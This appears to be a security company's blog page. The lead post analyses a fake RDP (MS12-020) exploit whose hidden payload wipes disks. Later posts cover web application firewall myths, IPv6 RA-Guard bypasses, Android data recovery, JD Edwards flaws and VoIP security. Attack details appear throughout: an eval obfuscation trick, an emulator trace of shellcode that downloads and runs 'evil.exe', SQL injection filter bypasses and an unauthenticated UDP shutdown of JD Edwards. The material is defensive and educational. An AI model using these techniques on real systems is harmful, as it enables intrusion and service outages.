Breaking

Untrusted code or why exploit code should only be executed by professionals

In march 2012 Microsoft announced a critical vulnerability (Microsoft Security Bulletin MS12-020) related to RDP that affects all windows operating systems and allows remote code execution. A lot of security professionals are expecting almost the same impact as with MS08-067 (the conficker vulnerability) and that it will be only a matter of time, until we will spot reliable exploits in the wild. Only a few days later an exploit, working for all unpatched windows versions was released, so it seems that they were right ;-), but of course no one will run an exploit without investigating the code. So lets have a look into the exploit Code.

First we take a look into the Microsoft advisory to get some information about the vulnerability itself:

The vulnerability requires some “specifically crafted RDP packets” to be sent to the vulnerable system to trigger the problem. We should spot this trigger in the exploit:

OK, the trigger is there and we also see some shellcode, that will open a bindshell on TCP port 8888. The next step is to figure out, what the exploit is doing with this code:

The exploit code converts a lot of opcodes to the big endian format, that looks reasonable because the exploit claims to work on all affected windows versions. The last step is to verifiy, how all the stuff is sent to the vulnerable system:

We see that target IP address and the RDP port are assigned and collected from the command line, the RDP packet is generated and the “specifically crafted RDP packets” are sent to the target.Finally the shellcode is sent and we are ready to connect to a remote shell that listens on TCP port 8888. Game over ;-).

We have verified the exploit, so it’s time now to run it against some unpatched test system and see, if we can compromise all these unpatched boxes out there …

…JUST KIDDING, never ever do that and I’m not talking about the legal issues this time ;-). It is a quite common mistake by unexperienced testers to work in this way. The exploit code was gathered from an untrusted source, so it needs detailed investigations before you run it, not just a short walk-through. You have to ensure that you understand every line of code completely to avoid being targeted by yourself, even the shellcode and the trigger of the rdp example. So let’s digg a little bit deeper into this.

First we have to extract the shellcode and trigger (the opcodes) from the exploit for further analysis. I prefer a special editor for this task that has all needed functionality (and much more 😉 ) built-in. It’s a commercial tool called “010 Editor” that can be obtained here and is available as a windows and MAC OS X version.

Step 1
Copy just the trigger opcodes into a dedicated text file, don’t forget to remove the double quotes. The text files should look almost like this:

trigger:

and shellcode:

Step 2
Use the editors replace function to replace “\x” with “0x” for the trigger and shellcode text files. Take the shellcode as an example, how the opcodes should look now:

Step 3
Mark all this hex data and copy it to the clipboard.

Step 4
Choose “File-New-New Hex File” from the “010 Editors” menu to create an empty hex file.

Step 5
Now choose “Edit-Paste From-Paste from Hex Text” to paste the data as hex data into the new hex file.

Step 6
Save both files (trigger and shellcode) as trigger.sc and shellcode.sc

Now we would be ready to analyze the opcodes with some toolset, but I assume that all of you already spotted some very interesting stuff within the shellcode part ;-):

Yes, it looks like the shellcode doesn’t open a bindshell, it just erases parts of your hard drive on windows and your complete root partition on unix.

This is really GAME OVER, if you would have run the exploit without a detailed analysis on a productive system. This code is referenced with the following code:

def __init__(self, payload, shellcode):
super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
self.payload = payload
self.table = __import__("__builtin__").__dict__
self.shellcode = shellcode

and then executed using this code:

seeker = (struct.pack(">I", 0x6576616c)
...
read = self.table[seeker[0]]
return str(read(shellcode)), parsed

But in case that the shellcode wouldn’t have been so easily readable, there are more options for an easy analysis. Based on the shellcode emulation library libemu there are some tools available to find out what the shellcode is doing without reverse engineering it. SCDBG is one that runs on all unix based systems and also on windows, you can grab it here.

Let us see how SCDBG works with a short example shellcode:
scdbg -f UrlDownloadToFile.sc
Loaded 150 bytes from file UrlDownloadToFile.sc
Initilization Complete..
Max Steps: 2000000
Using base offset: 0x401000
40104bLoadLibraryA(urlmon)
40107aGetTempPath(len=104, buf=12fce4)
4010b2URLDownloadToFile(http://blahblah.com/evil.exe0, C:\%TEMP%\dEbW.exe)
4010bdWinExec(c:\%TEMP%\dEbW.exe)
4010cbExitProcess(626801251)

Stepcount 293883

So the example shellcode downloads a malicious file and executes it, let’s have a look at our shellocde now:
scdbg -f shellcode.sc
Loaded 10d bytes from file shellcode.sc
Initilization Complete..
Max Steps: 2000000
Using base offset: 0x401000
401002opcode 69 not supported

Stepcount 2

SCDBG fails to analyze the shellcode (for obvious reasons as we already know), so you can take this result as a good hint, that some stuff is hidden in the code and that you better shouldn’t run it.

Lessons learned

So finally, let’s summarize some lessons that every serious penetration tester should be aware of:

1. Never run any untrusted code (especially exploits) without a detailed analysis.
2. Ensure that you understand every line of code and this also includes the shellcode.
3. Before using untrusted code in a real pentest, verify it in a test environment (virtual machines are a good choice for that).
4. When using exploits on customer systems be aware that you’re running it on one of the assets of your customer! Don’t do that without your customers permission!
5. Your customer trusts your professional knowledge, so it’s your responsibility to avoid damaging any of your customers systems by mistake.

So happy practicing and enjoy your week 😉

Michael

Continue reading
Misc

The 5 Myths of Web Application Firewalls

Some days ago a security advisory related to web application firewalls (WAFs) was published on Full Disclosure. Wendel Guglielmetti Henrique found another bug in the IBM Web Application Firewall which can be used to circumvent the WAF and execute typical web application attacks like SQL injection (click here for details). Wendel talked already (look here) at the Troopers Conference in 2009 about the different techniques to identify and bypass WAFs, so this kind of bypass methods are not quite new.

Nevertheless doing a lot of web application assessments and talking about countermeasures to protect web applications there’s a TOP 1 question I have to answer almost every time: “Wouldn’t it be helpful to install a WAF in front of our web application to protect them from attacks?”. My typical answer is “NO” because it’s better to spent the resources for addressing the problems in the code itself. So I will take this opportunity to write some rants about sense and nonsense of WAFs ;-). Let’s start with some – from our humble position – widespread myths:

1. WAFs will protect a web application from all web attacks .
2. WAFs are transparent and can’t be detected .
3. After installation of a WAF our web application is secure, no further “To Dos” .
4. WAFs are smart, so they can be used with any web application, no matter how complex it is .
5. Vulnerabilities in web applications can’t be fixed in time, only a WAF can help to reduce the attack surface.

And now let us dig a little bit deeper into these myths ;-).

1. WAFs will protect a web application from all web attacks

There are different attack detection models used by common WAFs like signature based detection, behavior based detection or a whitelist approach. These detection models are also known by attackers, so it’s not too hard to construct an attack that will pass the detection engines.

Just a simple example for signatures ;-): Studying sql injection attacks we can learn from all the examples that we can manipulate “WHERE clauses” with attacks like “or 1=1”. This is a typical signature for the detection engine of WAFs, but what about using “or 9=9” or even smarter 😉 “or 14<15”? This might sound ridiculous for most of you, but this already worked at least against one  WAF 😉 and there are much more leet attacks to circumvent WAFs (sorry that we don’t disclose any vendor names, but this post is about WAFs in general).
Another point to mention are the different types of attacks against web applications, it’s not all about SQL injection and Cross-Site Scripting attacks, there also logic flaws that can be attacked or the typical privilege escalation problem “can user A access data of user B?”. A WAF can’t protect against these attacks, it a WAF can raise the bar for attackers under some circumstances, but it can’t protect a web application from skilled attackers.

2. WAFs are transparent and can’t be detected

In 2009, initially at Troopers ;-), Wendel and Sandro Gauci published a tool called wafw00f and described their approach to fingerprint WAFs in different talks at security conferences. This already proves that this myth is not true. Furthermore there will be another tool release from ERNW soon, so stay tuned, it will be available for download shortly ;-).

3. After installation of a WAF my web application is secure, no further “To Dos”

WAFs require a lot of operational effort just because web applications offer more and more functionality and the main purpose of a web application is to support the organization’s business. WAF administrators have to ensure that the WAF doesn’t block any legitimate traffic. It’s almost the same as with Intrusion Detection and Prevention Systems, they require a lot of fine tuning to detect important attacks and ensure functionality in parallel. History proves that this didn’t (and still doesn’t) work for most IDS/IPS implementations, why should it work for WAFs ;-)?

4. WAFs are smart, so they can be used with any web application, no matter how complex it is
Today’s web applications are often quite complex, they use DOM based communication, web services with encryption and very often they create a lot of dynamic content. A WAF can’t use a whitelist approach or the behavior based detection model with these complex web applications because the content changes dynamically. This reduces the options to the signature based detection model which is not as effective as many people believe (see myth No. 1).

5. Vulnerabilities in web applications can’t be fixed in time, only a WAF can help to reduce the attack surface
This is one of the most common sales arguments, because it contains a lot of reasonable arguments, but what these sales guys don’t tell is the fact, that a WAF won’t solve your problem either ;-).
Talking about risk analysis the ERNW way we have 3 contributing factors: probability, vulnerability and impact. A WAF won’t have any influance on the impact, because if the vulnerability gets exploited there’s still the same impact. Looking at probabilities with the risk analysis view, you have to take care that you don’t consider existing controls (like WAFs 😉 ) because we’re talking about the probability that someone tries to attack your web application and I think that’s pretty clear that the installation of a WAF won’t change that ;-). So there’s only the vulnerability factor left that you can change with the implementation of controls.
But me let me ask one question using the picture of the Fukushima incident: What is the better solution to protect nuclear plants from tsunamis? 1. Building a high wall around it to protect it from the water? 2. Build the nuclear plant at a place where tsunamis can’t occur?

I think the answer is obvious and it’s the same with web application vulnerabilities, if you fix them there’s no need for a WAF. If you start using a Security Development Lifecycle (SDL) you can reach this goal with reasonable effort ;-), so it’s not a matter of costs.

Clarifying these myths of web application firewalls, I think the conclusions are clear. Spend your resources for fixing the vulnerabilities in your web applications instead of buying another appliance that needs operational effort, only slightly reducing the vulnerability instead of eliminating it and also costing more money. We have quite a lot of experience supporting our customers with a SDL and from this experience we can say, that it works effectively and can be implemented more easily than many people think.

You are still not convinced ;-)? In short we will publish an ERNW Newsletter (our newsletter archive can be found here) describing techniques to detect und circumvent WAFs and also a new tool called TSAKWAF (The Swiss Army Knife for Web Application Firewalls) which implements these techniques for practical use. Maybe this will change your mind ;-).

have a nice day,

Michael

Continue reading
Building

The Story Continues – Another IPv6 Update

TROOPERS12 came to an end last week on Friday; needless to say it was an awesome  event. 😉
The first two days offered workshops on various topics. On Monday Enno, Marc “Van Hauser” Heuse and I gave a one day workshop on “Advanced IPv6 Security”.  I think attendees as well as trainers had a real good time during and after the workshop fiddling around with IPv6. Especially Marc had quite some fun as he discovered that we provided “global” IPv6 Connectivity for the conference network, and according to one of his tweets, TROOPERS12 was the first security conference he visited, offering this kind of connectivity.

So back to the topic

Our last posts on IPv6 Security go back to the first half of 2011. If you haven’t read them already, now it’s a good time to do so. You can find them here, here, here and here.

In the last post of the series Enno discussed how RA-Guard can be circumvented with clever use of extension headers. As a short reminder, the packet dump looks like this.


The Information of the upper-layer protocol is only present in the second fragment, so RA Guard does not kick in.

As we found out on the Heise IPv6 Kongress last year, this issue can be mitigated with the following parameter in an IPv6 ACL.

deny ipv6 any any undetermined-transport

As a reminder, this parameter drops all IPv6 packets where the upper-layer protocol information cannot be determined.

After the workshop was officially over, Marc and I played a little bit with this ACL Parameter to see if it is working as intended. So I configured the following IPv6 ACL on our beautiful Cisco 4948E:

4948E(config)#ipv6 access-list IPv6
4948E(config-ipv6-acl)#deny ipv6 any any undetermined-transport
4948E(config-ipv6-acl)#permit ipv6 any any
4948E(config)#interface g1/19
4948E(config-if)#ipv6 traffic-filter IPv6 in

We started the attack again with the following parameter:

Apparently nothing happened with my (IPv6 enabled) laptop (which is a good thing ;))

The corresponding packet dump looked quite unspectacular:

Only the STP packets could be seen, and the flooded router advertisements were dropped by the Switch.

So could this parameter solve the issue with the whole RA mess?

Unfortunately the answer is no. The ACL parameter does mitigate the issue with the fragmented router advertisement. However, the ACL parameter can be circumvented by using overlapping fragments. Unfortunately we couldn’t test this scenario because this wasn’t yet implemented in the THC Tool Suite, but this is just a matter of time…

The IPv6 Packet  basically looks like this:

Fragment 1:
IPv6 Header
Fragmentation Header
Destination Header (8 bytes)
ICMPv6 with Echo Request
Fragment 2:
IPv6 Header
Fragmentation Header with offset == 1 (equals position of 8th byte ==
start of Echo Request in first fragment)
ICMPv6 with RA

 

In this case it depends on the operating system whether or not the packet is discarded when overlapping fragments are detected. RFC 5722 is very specific on how these should be handled:

“When reassembling an IPv6 datagram, if one or more its
constituent fragments is determined to be an overlapping
fragment,the entire datagram (and any constituent fragments,
including those not yet received) MUST be silently discarded.”

So it is up to the operating system to implement this behavior. We’ll see how things work out 😉

If you’re interested in more IPv6 issues, or simply wanna chat about this topic, meet Enno and me again at the  Heise IPv6 Kongress this year in Frankfurt, where we will give a talk on IPv6 as well.

Have great day,
Chris

 

Continue reading
Breaking

A Comment on Android PIN bypass

Lately there have been some rumors on the full-disclosure mailing list referring to a blogpost of  Hatforce about a new method to bypass the PIN/password lock on Android Gingerbread phones.
The approach was to boot into the Recovery Mode and execute a reset to factory state. The ideal result should be a reliable wipe of the /data partition. However, the author managed to recover data after the wiping process. This has been stated as a method on extracting sensitive date without knowing the actual pin or passcode.

This approach was tested on a Nexus S smartphone with Android 2.3.6 assuming the problem could be present on other devices too.
As of our experience this actually affects all Android devices without device encryption. Meanwhile we had more than ten different Android 2.3.x devices from four different vendors. All of them need less than a minute for a factory reset. An actual example is the HTC Desire HD with a  1,1GB /data partition excluding the /cache partition. The factory reset procedure took about  40 seconds, which can hold as an advice to question if this time is actually sufficient to wipe the whole storage. Finally we have been able to recover data after factory-reset devices as part of previous studies.

Besides mentioning that the source code indicates Android devices runnig Android Honeycomb and later effectively wipe data. After looking up in the source code of Android Ice Cream Sandwich we found that the FileWriter class is used for the wipe of the /cache and /data partition. So no indication on overwriting the data here. We assume, that by mentioning the issue as resolved, he was referring to Android Honeycomb device encryption being use, which indeed resolves this issue. This feature has been announced as a new feature anyway.

The fact about getting the data without knowing the PIN however does not really fit the case. From our opinion that’s not a new thought anyway. As long as the storage is not encrypted there always ways to access and read it. My favorite way is to flash the recovery mode with a custom one, e.g. ClockWorkMod By this means it’s possible to run Android Debugging Bridge, su and dd binaries which in return can be used to connect to the device via USB cable and create a raw copy of the storage. Additionally it becomes available to follow the loudness principle and acquire data on a forensic level.

However there is one important aspect mentioned in the blogpost, which we fully agree with: lost device means lost data!

Have a great day

Sergej

 

Continue reading
Events

Troopers TelcoSecDay

As there has been some public demand for that, here we go with the final agenda for the Troopers “TelcoSecDay“. The workshop is meant to provide a platform for research exchange between operators, vendors and researchers. The slides of the talks will potentially be made available as well.

  • 8:30: Opening Remarks & Introduction
  • 9:00: Sebastian Schrittwieser (SBA Research): Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.
  • 10:00: Peter Schneider (NSN): How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?
  • 10:45: Break
  • 11:00: Kevin Redon (T-Labs): Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications
  • 11:45: Christian Kagerhuber (Group IT Security, Deutsche Telekom AG): Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)
  • 12:30: Lunch
  • 13:45: Philipp Langlois (P1 Security): Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.
  • 15:00: Break
  • 15:15: Harald Welte (sysmocom): Structural deficits in telecom security
  • 16:30: Closing Remarks
  • 17:00: End of workshop
  • 19:00: Joint dinner (hosted by ERNW) in Heidelberg Altstadt for those interested and/or staying for the main conference

====

Synopses & Bios

Sebastian Schrittwieser: Guess Who’s Texting You? Evaluating the Security of Smartphone Messaging Applications.

Synopsis: Recently, a new generation of Internet-based messaging applications for smartphones was introduced. While user numbers are estimated in the millions, little attention has so far been paid to the security of these applications. In this talk, we present our experimental results, which revealed major security flaws, allowing attackers to hijack accounts, spoof sender-IDs, and enumerate subscribers.

Bio: Sebastian Schrittwieser is a PhD candidate at the Vienna University of Technology and a researcher at SBA Research. His research interests include, among others, digital forensics, software protection, code obfuscation, and digital fingerprinting. Sebastian received a Dipl.-Ing. (equivalent to MSc) degree in Business Informatics with focus on IT security from the Vienna University of Technology in 2010.

===

Peter Schneider: How to secure an LTE-Network: Just applying the 3GPP security standards and that’s it?

Synopsis: This talk briefly introduces the security architecture of an LTE mobile network as specified by 3GPP and shows which threats it mitigates and which not. It discusses additional, not-standardized security measures and how they can contribute to making mobile networks as secure as they need to be.

Bio: After many years of research, prototyping and systems engineering in the area of communication technologies, Peter works currently as a senior expert for mobile network security in the Security Technologies Team at Nokia Siemens Networks Research. He is author of various mobile network related security concepts. He is also active in the 3GPP security standardization and in several security research projects.

===

Kevin Redon: Weaponizing Femtocells – The Effect of Rogue Devices on Mobile Telecommunications

Synopsis: Mobile phones and carriers trust the traditional base stations which serve as the interface between the mobile devices and the fixed-line communication network. Femtocells, miniature cellular base stations installed in homes and businesses, are equally trusted yet are placed in possibly untrustworthy hands. By making several modifications to a commercially available femtocell, we evaluate the impact of attacks originating from a compromised device. We show that such a rogue device can violate all the important aspects of security for mobile subscribers, including tracking phones, intercepting communication and even modifying and impersonating traffic. The specification also enables femtocells to directly communicate with other femtocells over a VPN and the carrier we examined had no filtering on such communication, enabling a single rogue femtocell to directly communicate with (and thus potentially attack) all other femtocells within the carrier’s network.

Bio: Kevin Redon does his master of computing at the Technische Universitaet Berlin. He also works for “Security in Telecommunication” (SecT), a research group of the university.

===

Christian Kagerhuber: Security Compliance Audit Automation (SCA, TeleManagementForum TMF528)

Synopsis: Today, Service Providers are in need of comprehensive information relevant to effective security management. Service Providers have to evaluate and verify the compliance of their infrastructure and services to corporate security  directives and legal guidelines. This includes being able to retrace OSS Operators’ behavior on OSS systems via standardized log messages. But to answer all necessary security compliance questions, log data alone appears not to be sufficient.
Service Providers need configuration data and telemetry data centralized at hand without manual, time-consuming OSS Operator activity. Even interactive polling of their devices is not sufficient because Service Providers must track down changes in the environment and the effective date/period. The talk is about what to solve this problem.

Bio: Christian is a Senior Security Expert at Deutsche Telekom (DT), responsible for the security of DT’s NGOSS system (called NGSSM) and BNG/SCRAT project. He build up T-Online’s Identity Management and CERT and is the author of various Deutsche Telekom security standards, e.g. on platform virtualisation and SSH.

===

Philippe Langlois: Assault on the GRX (GPRS Roaming eXchange) from the Telecom Core Network perspective, from 2.5G to LTE Advanced.

Synopsis: GRX is the global private network where Telecom network operators exchange GPRS roaming traffic of their users. It’s also used for all M2M networks where roaming is used, and that is the case from some company’s truck fleet management system down to intelligence GPS location spybug tracking system. GPRS has been there from 2.5G GSM networks to the upcoming LTE Advanced networks, and is now quite widespread technology, along with its attacks. GRX has had a structuring role in the global telecom world at a time where IP dominance was being to be acknowledged. Now it has expanded to a lightweight structure using both IP technologies and ITU-originated protocols.
We’ll see how this infrastructure is protected and can be attacked, and we’ll discover the issues with the specific telco equipment inside GRX, namely GGSN and SGSN but also now PDN Gateways in LTE and LTE Advanced “Evolved Packet Core”. We will see its implication with GTP protocol, DNS infrastructure, AAA servers and core network technologies such as MPLS, IPsec VPNs and their associated routing protocols. These network elements were rarely evaluated for security, and during our engagements with vulnerability analysis, we’ve seen several typical vulnerabilities that we will be showed in this speech. We will demo some of the attacks on a simulated “PS Domain” network, that it the IP part of the Telecom Core Network that transports customers’ traffic, and investigate its relationships with legacy SS7, SIGTRAN IP backbones, M2M private corporate VPNs and telecom billing systems. We will also seem how automation enable us to succeed at attacks which are hard to perform and will show how a “sentinel” attack was able to compromise a telecom Core Network during one penetration test.

Bio: Philippe Langlois is a leading security researcher and expert in the domain of telecom and network security. He founded internationally recognized security companies (Qualys, WaveSecurity, INTRINsec, P1 Security) as well as led technical, development and research teams (Solsoft, TSTF). He founded Qualys and led the world-leading vulnerability assessment service. He founded a pioneering network security company Intrinsec in 1995 in France. His founded his first business, Worldnet, France’s first public Internet service provider, in 1993. Philippe was also lead designer for Payline, one of the first e-commerce payment gateways. He has written and translated security books, including some of the earliest references in the field of computer security, and has been giving speeches on network security since 1995 (Interop, BlackHat, HITB, Hack.lu). Previously professor at Ecole de Guerre Economique and various universities in France (Amiens, Marne La VallĂ©e) and internationally (FUSR-U, EERCI). He is a FUSR-U (Free University for Security Research) collaborator and founding member. Philippe is providing industry associations (GSM Association Security Group, several national organizations) and governmental officials with Critical Infrastructure advisory conferences in Telecom and Network security. Now Philippe is providing with P1 Security the first Core Network Telecom Signaling security scanner & auditor which help telecom companies, operator and government analyze where and how their critical telecom network infrastructure can be attacked. He can be reached through his website at: http://www.p1security.com
He has presented previously at these security/hacking conferences: Hack.lu, Hack in the Box (HITB), Blackhat, Hackito Ergo Sum (paris, France), SOURCE, Chaos Communication Congress (Berlin, Germany), ekoparty (bueos aires, argentina), H2HC (sao paulo, brazil), SYSCAN (Hong Kong; Thailand), Bellua (Jakarta, Indonesia), INT (Mauritius), Interop… (some events listed there http://www.p1sec.com/corp/about/events/ )

===

Harald Welte: Structural deficits in telecom security

Synopsis: Especially in recent years, numerous practical attacks and tools have been developed and released.  The attack patterns and methods from the dynamic Internet world have finally caught up with the dinosaur of the Telecom world.  So far, the industry has failed to demonstrate sufficient interest in developing proper responses.  The changes so far have been superficial.  Are they a sufficient response for what is to come?  Has the telecom industry realized the true implications of having left the “walled garden”?  The talk will leave the field of actual attacks behind in order to talk about what at least the author perceives as structural deficits in terms of IT security at operators and equipment vendors.

Bio: Harald Welte is communications security consultalt for more than a decade. He was co-author of tne netfilter/iptables packet filter in the Linux kernel and has since then been involved in a variety of Free Software based implementations of protocol stacks for RFID, GSM, GPRS, and TETRA.  His main interest is to look at security of communication systems beyond the IP-centric mainstream.  Besides his consulting work, he is the general manager of Sysmocom GmbH, providing custom tailored communications solutions to customers world-wide.

===

Have a great Sunday everybody, see you soon at Troopers 😉

Enno

Continue reading
Breaking

ERP Platforms Are Vulnerable

This is a guest post by the SAP security expert Juan Pablo Perez-Etchegoyen, CTO of  Onapsis. Enjoy reading:

At Onapsis we are continuously researching in the ERP security field to identify the risks that ERP systems and business-critical applications are exposed to. This way we help customers and vendors to increase their security posture and mitigate threats that may be affecting their most important platform: the one that stores and manages their business’ crown jewels.

We have been talking about SAP security in many conferences over the last years, not only showing how to detect insecure settings and vulnerabilities but also explaining how to mitigate and solve them.  However, something that is still less known is that since 2009 we have been also doing research over Oracle’s ERP systems (JD Edwards, Siebel, PeopleSoft, E-Business Suite) and reporting vulnerabilities to the vendor. In this post, I’m going to discuss some of the vulnerabilities that we reported, Oracle fixed and released patches in the latest CPU (Critical Patch Update) of January 2012. In this CPU, 8 vulnerabilities reported by Onapsis affecting JD Edwards were fixed.

What’s really important about these vulnerabilities is that most of them are highly critical, enabling a remote unauthenticated attacker to fully compromise the ERP server just having network access to it.  I’m going to analyze some these vulnerabilities to shed some light on the real status of JD Edwards’ security. Most of these vulnerabilities are exploitable through the JDENET service, which is a proprietary protocol used by JDE for connecting the different servers.

Let’s take a look at the most interesting issues:

ONAPSIS-2012-001: Oracle JD Edwards JDENET Arbitrary File Write

Sending a specific packet in the JDENET message, an attacker can basically instruct the server to write an arbitrary content in an arbitrary location, leading to an arbitrary file write condition.

ONAPSIS-2012-002: Oracle JD Edwards Security Kernel Remote Password Disclosure

Sending a packet containing key hard-coded in the kernel, an attacker can “ask for” a user’s password (!)

ONAPSIS-2012-003: Oracle JD Edwards SawKernel Arbitrary File Read

An attacker can read any file, by connecting to the JDENET service.

ONAPSIS-2012-007: Oracle JD Edwards SawKernel SET_INI Configuration Modification Modifications to the server configuration (JDE.INI) can be performed remotely and without authentication. Several attacks are possible abusing this vulnerability.

ONAPSIS-2012-006: Oracle JD Edwards JDENET Large Packets Denial of Service

If an attacker sends packets larger than a specific size, then the server’s CPU start processing at 100% of its capacity. Game over.

As a “bonus” to this guest blog post, I would like to analyze a vulnerability related to the set of  security advisories we released back on April 2011 (many of them also critical). This vulnerability is the ONAPSIS-2011-07.

The exploitation of this weakness is very straight-forward, as the only thing an attacker needs to do is to send a packet to the JDENET command service (typically UDP port 6015) with the message “SHUTDOWN”, and all JD Edwards services are powered off! Business impact? None of the hundreds/thousands of the company’s employees that need the ERP system to do their every-day work will be able to do their job.

Some people still talk about ERP security as a synonym of Segregation of Duties controls. This is just an example of a high-impact Denial of Service attack that can be performed against the technical components of these systems. No user or password. No roles or authorizations.

Even worse, as UDP connections are stateless, it’s trivial for the attacker to forge its source and exploit the vulnerability potentially bypassing firewall filters.

Hope you enjoyed our post and I’d like to thank Enno, Florian and the great ERNW team for their kind invitation.

You can get more information about our work at www.onapsis.com

BTW: Meet Mariano Nuñez Di Croce, CEO of Onapsis at TROOPERS12 in about ten days! He will give a talk and also host a dedicated workshop on SAP security.

Continue reading
Building

Applying the ERNW Seven Sisters Approach to VoIP Networks

Hi,

if you’re following this blog regularly or if you’ve ever attended an ERNW-led workshop which included an “architecture section” you will certainly remember the “Seven Sisters of Infrastructure Security” stuff (used for example in this post). These are a number of (well, more precisely, it’s seven ;-)) fundamental security principles which can be applied to any complex infrastructure, be that a network, a building, an airport or the like.

As part of our upcoming Black Hat and Troopers talks we will apply those principles to some VoIP networks we (security-) assessed and, given we won’t cover them in detail there, it might be helpful to perform a quick refresher of them, together with an initial application to VoIP deployments. Here we go; these are the “Seven Sisters of Infrastructure Security”:

  • Access Control
  • Isolation
  • Restriction
  • Encryption
  • Entity Protection
  • Secure Management
  • Visibility

Now, let me discuss them in a bit more detail and put them into a VoIP context.

 

Access Control (“try to keep the threats out of the environment containing the assets to be protected”)

This should pretty much always be an early consideration as limiting access to “some complex infrastructure” obviously provides a first layer of defense and does so in a preventative[1] way. Usually authentication plays a major role here. Please note that in computer networks the access control principle does not only encompass “access to the network [link]” (where unfortunately the most prevalent technology – Ethernet – does not include easy-to-use access control mechanisms. And, yes, I’m aware of 802.1X…) but can be applied to any kind of (“sub-level”) communication environment or exchange. Taking a “passive-interface” approach for routing protocols is a nice example here as this usually serves to prevent untrusted entities (“the access layer”) from participating in some critical protocol [exchange][2] at all.

In a VoIP scenario limiting who can participate in the various layers and communication exchanges, be it by authentication, be it by configuration of static communication peers for certain exchanges[3] (yes, we know this might not scale and usually has a bad operational feasibility) would be an implementation of the access control principle.

 

Isolation (“separate some elements of the environment from others, based on attributes like protection need, threat potential or trust/worthiness”)

In computer networks this one is usually implemented by network segmentation (with different technologies like VLANs or VRFs and many others) and it’s still one of the most important infra­structure security principles. I mean, can you imagine an airport or corporate headquarters without areas of differing protection needs, different threat exposure or separate layers and means of access? [You can’t? So why do you think about virtualizing all your corporate computer systems on one big unified “corporate cloud”? ;-)]

Again, it should be noted that “traditional network segmentation” is only one variant. Using RFC 1918 (or ULA, for that matter) addresses in some parts of your network without NATing them at some point, or refraining from route distribution at some demarcation point constitute other examples.

In the VoIP world the main realization of the isolation principle is the commonly found approach of “voice vs. data VLAN[s]”.

 

Restriction (“once [as of the above principle] isolated parts get connected try to limit the interaction between those parts at the intersection point”)

This is the one most people think of when it comes to network security as this is what the most widely deployed network security control, that is firewalls, is supposed to do.

Two points should be noted here, from our perspective:

In some network security architecture documents phrases going like “the different segments are [to be] separated by firewalls” can be found. Which, well, is a misconception: usually a firewall connects networks (which would be isolated otherwise), it does not separate them. It may (try to) limit the traffic passing the intersection point but it still is a connection element.

And it should be noted that the restriction it applies (by filtering traffic) always has an operational price tag. Which is the one of the reasons why firewalls nowadays tend to fail so miserably when it comes to their actual security benefit…

In VoIP networks using the restriction approach is considerably hard (and hence quite often simply doesn’t happen) given a number of protocols’ volatility when it comes to the (UDP/TCP) ports they use.
Encryption (“while in transit encrypt some asset to protect it from threats on its [transit] way”)
This is a very common infrastructure security control as well (alas, at times the only one people think of) and probably does not need further explanation here.

Still it should be noted – again – that it has an operational price tag (key management and the like). Which – again – is the very reason why it sometimes fails so miserably when it comes to providing actual security…

In the VoIP world (as this one is very much about “assets in transit”) it’s (nowadays) a quite common one, even though still a number of environments refrains from using it, mainly due to the mentioned “operational price tag”.
Entity Protection (“take care of the security exposure of the individual elements within the environment containing the assets to be protected”)

This encompasses all measures intended to increase the security of individual elements. It’s not limited to simple hardening though, but includes all other “security [posture] quality assurance” things like pentesting or code reviews (when the element looked at is an application).

Adding a comment again I’d like to state that, in times of virtualization and vaporizing security layers (deploying shiny apps pretty much directly connecting customers to your ERP systems, by means of fancy webservices) this one might become more and more important. In the past many security architectures relied on layers of isolation & restriction and thereby skipped the hardening/quality assurance step (“we don’t have to harden this Solaris box as there’s a firewall in front of it”). As the talks’ case studies will show this one is a fundamental (and overlooked) one in many VoIP deployments.

Secure Management (“manage the [infrastructure] elements in a secure way”)

Secure management usually can be broken down to:

  • Restrict the endpoints allowed to establish management connections.
  • Either use a trusted environment (network link) or use secure variants of mgmt. protocols instead of their less secure counterparts (SSH vs. Telnet, HTTPS vs. HTTP, SNMPv3 vs. community-based SNMP and the like).
  • Require sufficient authentication (as for methods, authenticator [e.g. password] quality, personalized accounts etc.).
  • Logging of security related events and potentially all management actions performed.

 

While this is (should be) an obvious security principle, daily assessment experience shows that failures/weaknesses in this space account for the majority of critical vulnerabilities when it comes to infrastructure security. This applies in particular to VoIP implementations (see the case studies for examples).

Visibility (“be able to assess the current security posture of your infrastructure and its elements with reasonable effort”)

This is where logging (+ analysis), monitoring etc. come into play. We’d like to note that while this is a valid infrastructure security principle, its actual security benefit is often overestimated given the “detection/reaction” nature of this principle and its subsequent bad operational feasibility.

This is a particularly interesting (and neglected) one in many VoIP environments. Usually the data generated in this space (for VoIP) can not be easily processed (by $SIEM you acquired two years ago, for a six-figure € number and which still has only a handful of use cases defined
), while on the other hand being heavily useful (or even required for legal follow-up) in one of those numerous billing fraud incidents.
How to Apply those Principles in a Generic Way

As the above application to VoIP shows, these fundamental security principles allow for tackling any type of “securing assets within a complex overall setting” by going through a simple (checklist-type) set of questions derived from them. These questions could look like

  • Can we limit who’s taking part in some network, protocol, technology, communication act?
  • Any need to isolate stuff due to different protection need, (threat) exposure or trust(worthiness)?
  • What can be done, filtering-wise, on intersection points?
  • Where to apply encryption in an operationally reasonable way?
  • What about the security of the overall system’s main elements?
  • How to manage the infrastructure elements in a secure way?
  • How to provide visibility as for security-related stuff, with reasonable effort?
In a sequel to this post I might cover the mentioned case studies in more detail. In case I miss doing so, the slides will be available after the respective events ;-).
Have a great Sunday,
Enno


[1] As it requires the usually most scarce resource of an organization, that is humans and their brains. The part that can not be easily substituted by technology



[1] In general preventative controls have a better cost/benefit ratio than detective or reactive ones. And this is still true in the “you’ll get owned anyway that’s why you should spend lots of resources on detective/reactive controls” marketing hype age


[2] To provide another example from the routing protocol space: the “inter-operator trust and TCP-” based nature of BGP (as opposed to the “multicast and UDP-“based nature of other routing protocols) certainly is one of the most fundamental stability contributing properties of the current Internet.

[3] Another simple example here. If the two VoIP gateways in the incident described here had used a host route for each other instead of their default route (which wasn’t needed given their only function was to talk to each other), presumably the whole thing wouldn’t have happened.

 

Continue reading
Misc

Sell Your Own Device – A Field Study on Decommissioning of Mobile Devices

